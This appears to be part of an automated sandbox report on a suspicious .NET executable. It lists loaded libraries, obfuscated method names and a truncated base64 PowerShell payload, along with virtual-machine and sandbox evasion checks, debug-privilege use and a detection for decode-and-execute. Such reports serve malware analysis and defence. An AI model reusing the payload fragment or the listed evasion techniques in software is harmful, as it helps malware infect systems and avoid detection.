          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeSection loaded: kdscli.dllJump to behavior
          Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
          Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
          Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
          Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\curl.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\curl.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\curl.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\curl.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: n0PDCyrFnf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: n0PDCyrFnf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Data Obfuscation

          barindex
          .NET source code contains method to dynamically call methods (often used by packers)
          Source: n0PDCyrFnf.exe, jwyfyp5v6sYM3bcUbO.cs.Net Code: Type.GetTypeFromHandle(SmsUid6a13C7uALaSAt.JIthwNIGq7(16777292)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(SmsUid6a13C7uALaSAt.JIthwNIGq7(16777240)),Type.GetTypeFromHandle(SmsUid6a13C7uALaSAt.JIthwNIGq7(16777237))})
          Found suspicious powershell code related to unpacking or dynamic code loading
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeAnti Malware Scan Interface: frOmBAse64stRInG('lVh/U9tIEv07VPEdplRULWSR+Z3lfMVWjG2CEwwctsOlznfOIA1Yi6zRzowMXsJ339czkiwDSQ5X2ZZGPT2vu1//sFeMvBUJO2Deb3tb7/6xu7f9brPeaBwfvTvf208/jm53/C/NvXZ797M46/zph7+l7f3OjN94y0srwZibTkh7/a3Nze2td3
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeCode function: 0_2_00007FFD9B6B378B push esp; iretd 0_2_00007FFD9B6B3791
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeCode function: 0_2_00007FFD9B75D00C push eax; iretd 0_2_00007FFD9B75D00D
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeCode function: 0_2_00007FFD9B756935 push eax; ret 0_2_00007FFD9B756959
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeCode function: 0_2_00007FFD9B991FF0 push eax; retf 0_2_00007FFD9B991FF1
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeCode function: 0_2_00007FFD9B99056C push eax; retf 0_2_00007FFD9B99056D
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeCode function: 0_2_00007FFD9B991F55 push eax; retf 0_2_00007FFD9B991F56
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeCode function: 0_2_00007FFD9B9D77B8 pushad ; retf 0_2_00007FFD9B9D7959
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeCode function: 0_2_00007FFD9B9D897A push edx; iretd 0_2_00007FFD9B9D897B
          Source: n0PDCyrFnf.exeStatic PE information: section name: .text entropy: 7.361258356562657
          Source: n0PDCyrFnf.exe, V6858m6FttC1TaEJs5I.csHigh entropy of concatenated method names: 'RwPmPJDCY4', 'AsZmLTgvoe', 'FsemFaalth', 'N2FmyKRtX6', 'IkAmuWvSk2', 'lQHmMcLdKe', 'H0JmS4kpyA', 'MnQAibkTn1', 'RRxmswbL3Q', 'QxNmEqt0kQ'
          Source: n0PDCyrFnf.exe, GZJp6062PcAiGVFakbJ.csHigh entropy of concatenated method names: 'qXD60fVmaY', 'GTt6nEWnBW', 'Jhi6wPD62Y', 'o2k6cMsbYP', 'Ouu64XPsM0', 'hqB6DqFDl5', 'iV96oKAsch', 'UhK6KQQJZY', 'jIv6PLlC1U', 'wkW6LRcG7t'
          Source: n0PDCyrFnf.exe, jwyfyp5v6sYM3bcUbO.csHigh entropy of concatenated method names: 'oidhVcUsyhMK9dIv0KB', 'Klj6ZTUEkbfqwQU0CMi', 'xIXqe83Wqh', 'doCyL0UtwdMWONdWcdZ', 'kOx1h7U8NSosli0mG5p', 'UUgt7SU7YRB1jQampwK', 'KFNGaxUeccfC7EGMvZn', 'jjMsHWUgHpoQO9aGOdP', 'WdGN9HUZ54OgbvC9jbg', 'BacMGBUJ5cbaYAOkx76'

          Hooking and other Techniques for Hiding and Protection

          barindex
          Loading BitLocker PowerShell Module
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Queries memory information (via WMI often done to detect virtual machines)
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
          Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
          Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_service
          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeMemory allocated: 1110000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeMemory allocated: 1BD30000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeWindow / User API: threadDelayed 5927Jump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeWindow / User API: threadDelayed 3806Jump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exe TID: 5516Thread sleep time: -10145709240540247s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystemProduct
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: curl.exe, 00000003.00000003.1792789597.000001CC6B8B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<<*
          Source: n0PDCyrFnf.exe, 00000000.00000002.1827332708.0000000020027000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: n0PDCyrFnf.exe, 00000000.00000002.1827881760.00000000200B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\n0PDCyrFnf.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Yara detected Powershell decode and execute
          Source: Yara matchFile source: amsi64_2588.amsi.csv, type: OTHER
